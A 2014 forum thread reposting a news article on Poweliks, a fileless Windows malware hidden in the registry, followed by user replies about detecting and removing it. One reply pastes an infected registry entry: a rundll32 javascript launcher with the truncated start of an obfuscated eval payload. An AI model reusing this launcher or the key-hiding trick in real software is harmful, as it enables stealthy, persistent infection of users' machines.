Windows Registry-infecting malware has no files, survives reboots

Discussion in 'Windows - Virus and spyware problems' started by ireland, Aug 4, 2014.

  1. ireland

    ireland Active member

    Joined:
    Nov 28, 2002
    Messages:
    3,451
    Likes Received:
    15
    Trophy Points:
    68
    Windows Registry-infecting malware has no files, survives reboots

    Antivirus doesn't stand a chance becuase there's nothing for it to scan

    Researchers have detailed a rare form of Windows malware that maintains infection on machines and steals data without installing files.

    The malware resides in the computer registry only and is therefore not easy to detect.

    It code reaches machines through a malicious Microsoft Word document before creating a hidden encoded autostart registry key, malware researcher and black hat exterminator Paul Rascagneres (@r00tbsd) says. It then creates and executes shellcode and a payload Windows binary.

    "All activities are stored in the registry. No file is ever created," Rascagneres said in a post.

    "So, attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a machine] even after a system re-boot.

    "To prevent attacks like this, anti-virus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reached the customer's email inbox."

    Windows Regedit cannot read or open the non-ASCII key entry. Rascagneres said the feature set was akin to a Matryoshka Doll due to its subsequent and continual 'stacked' execution of code.

    The non-ASCII trick is a tool Microsoft uses to hide its source code from being copied, but the feature was later cracked.

    Security kit can alternatively detect the software exploit, or as a final step monitor the registry for unusual behaviour, he said.

    Malware geeks on the KernelMode.info forum last month analysed one sample which exploited the flaws explained in CVE-2012-0158 that affected Microsoft products including Office.

    Deviants distributed the malware under the guise of Canada Post and UPS emails purportedly carrying tracking information.

    "This trick prevents a lot of tools from processing this malicious entry at all and it could generate a lot of trouble for incident response teams during the analysis. The mechanism can be used to start any program on the infected system and this makes it very powerful," Rascagneres said.

    Rascagneres has made a name ripping malware and bots to uncover and undermine black hat operations. He won last years' Pwnie Award at Black Hat Las Vegas for tearing through the infrastructure of Chinese hacker group APT1.
    Tips & corrections


    http://www.theregister.co.uk/2014/08/04/registryinfecting_rebootresisting_malware_has_no_files/
     
  2. Mez

    Mez Active member

    Joined:
    Aug 12, 2005
    Messages:
    2,895
    Likes Received:
    9
    Trophy Points:
    68
    Thanks for both articles. 2 more ways all AVs can be circumvented.
     
  3. 2oldGeek

    2oldGeek Active member

    Joined:
    Jun 16, 2005
    Messages:
    3,658
    Likes Received:
    38
    Trophy Points:
    78
    You are correct Mez, it hides from AV's but not from the oldGeek..
    Stealthy, tricky its called 'Poweliks' malware and hides in your system registry - but not your hard drive

    Update read here:
    http://www.pcworld.com/article/2461...poweliks-resides-only-in-system-registry.html

    It can be found and I am working on the removal steps now.. If you or anyone on here ever thinks they have this threat, just give me a call.. Finding it is the hardest part but removal should be easy...

    The reg key looks like this, from one of my scans of an infected computer using Farber Recovery Scan Tool:

    CustomCLSID: HKU\S-1-5-21-3757869674-2007659679-1543038487-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <=Poweliks hiding here..
     

Share This Page